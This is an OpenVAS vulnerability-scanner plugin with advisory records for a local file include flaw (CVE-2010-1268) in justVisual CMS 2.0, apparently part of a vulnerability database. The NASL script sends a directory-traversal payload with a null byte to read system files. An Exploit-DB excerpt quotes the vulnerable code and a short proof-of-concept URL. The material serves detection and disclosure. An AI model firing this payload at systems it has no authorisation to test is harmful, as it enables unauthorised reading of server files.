justVisual 'p' Parameter Local File Include Vulnerability
2010-03-26T00:00:00
ID OPENVAS:1361412562310100555 Type openvas Reporter Copyright (C) 2010 Greenbone Networks GmbH Modified 2020-05-06T00:00:00
Description
justVisual is prone to a local file-include vulnerability because it
fails to properly sanitize user-supplied input.
###############################################################################
# OpenVAS Vulnerability Test
#
# justVisual 'p' Parameter Local File Include Vulnerability
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (C) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100555");
script_version("2020-05-06T07:10:15+0000");
script_tag(name:"last_modification", value:"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)");
script_tag(name:"creation_date", value:"2010-03-26 13:01:50 +0100 (Fri, 26 Mar 2010)");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2010-1268");
script_bugtraq_id(38970);
script_name("justVisual 'p' Parameter Local File Include Vulnerability");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/38970");
script_xref(name:"URL", value:"http://fh54.de/2009/09/justvisual2/");
script_tag(name:"summary", value:"justVisual is prone to a local file-include vulnerability because it
fails to properly sanitize user-supplied input.");
script_tag(name:"impact", value:"An attacker can exploit this vulnerability to obtain potentially
sensitive information and execute arbitrary local scripts in the context of the
webserver process. This may allow the attacker to compromise the application and
the underlying computer. Other attacks are also possible.");
script_tag(name:"affected", value:"justVisual 2.0 and prior are vulnerable.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
exit(0);
}
include("host_details.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = http_get_port( default:80 );
if( ! http_can_host_php( port:port ) ) exit( 0 );
files = traversal_files();
foreach dir( make_list_unique( "/jv/www", "/www", http_cgi_dirs( port:port ) ) ) {
foreach file( keys( files ) ) {
if( dir == "/" ) dir = "";
url = string( dir, "/index.php?p=../../../../../../../../../../", files[file], "%00" );
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
}
exit( 99 );
{"id": "OPENVAS:1361412562310100555", "type": "openvas", "bulletinFamily": "scanner", "title": "justVisual 'p' Parameter Local File Include Vulnerability", "description": "justVisual is prone to a local file-include vulnerability because it\n fails to properly sanitize user-supplied input.", "published": "2010-03-26T00:00:00", "modified": "2020-05-06T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100555", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/38970", "http://fh54.de/2009/09/justvisual2/"], "cvelist": ["CVE-2010-1268"], "lastseen": "2020-05-08T19:11:55", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1268"]}, {"type": "exploitdb", "idList": ["EDB-ID:11876"]}], "modified": "2020-05-08T19:11:55", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-05-08T19:11:55", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "1361412562310100555", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# justVisual 'p' Parameter Local File Include Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100555\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-03-26 13:01:50 +0100 (Fri, 26 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2010-1268\");\n script_bugtraq_id(38970);\n script_name(\"justVisual 'p' Parameter Local File Include Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/38970\");\n script_xref(name:\"URL\", value:\"http://fh54.de/2009/09/justvisual2/\");\n\n script_tag(name:\"summary\", value:\"justVisual is prone to a local file-include vulnerability because it\n fails to properly sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to obtain potentially\n sensitive information and execute arbitrary local scripts in the context of the\n webserver process. This may allow the attacker to compromise the application and\n the underlying computer. Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"justVisual 2.0 and prior are vulnerable.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/jv/www\", \"/www\", http_cgi_dirs( port:port ) ) ) {\n\n foreach file( keys( files ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = string( dir, \"/index.php?p=../../../../../../../../../../\", files[file], \"%00\" );\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2020-10-03T11:57:23", "description": "Directory traversal vulnerability in index.php in justVisual CMS 2.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files directory traversal sequences in the p parameter. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2010-04-06T15:30:00", "title": "CVE-2010-1268", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1268"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/a:fh54:justvisual:2.0"], "id": "CVE-2010-1268", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1268", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fh54:justvisual:2.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T15:13:19", "description": "justVisual 2.0 (index.php) <= LFI Vulnerability. CVE-2010-1268. Webapps exploit for php platform", "published": "2010-03-25T00:00:00", "type": "exploitdb", "title": "justVisual 2.0 index.php <= LFI Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1268"], "modified": "2010-03-25T00:00:00", "id": "EDB-ID:11876", "href": "https://www.exploit-db.com/exploits/11876/", "sourceData": "#########################################################################\r\n\tjustVisual 2.0 (index.php) <= LFI Vulnerability\r\n#########################################################################\r\n\r\n[+]Title:\tjustVisual 2.0 (index.php) Local File Vulnerability\r\n[+]Version:\t2.0\r\n[+]License:\thttp://www.gnu.org/copyleft/gpl.html\r\n[+]Download:\thttp://fh54.de/justVisual/packages/justVisual2.zip\r\n[+]Risk:\tMedium\r\n[+]Local:\tYes\r\n[-]Remote:\tNo\r\n\r\n###########################################################\r\n[!]Author: eidelweiss\r\n[!]Contact: eidelweiss[at]cyberservices[dot]com\r\n[!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)\r\n[!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends\r\n###########################################################\r\n\r\n-=[ VULN CODE ]=-\r\n\r\n\t$selfname=basename($_SERVER['PHP_SELF'],'.php'); \r\n\tif(isset($_GET['p']) && !empty($_GET['p'])) {\r\n\t\t//$selfname=basename($_GET['p'],'.php');\r\n\t\t$selfname=str_replace('.php','',$_GET['p']);\r\n\r\n\r\n-=[ P0C ]=-\r\n\r\n\tHttp://127.0.0.1/index.php?p=[LFI]\r\n\r\n###############################=[E0F]=###################################", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/11876/"}]}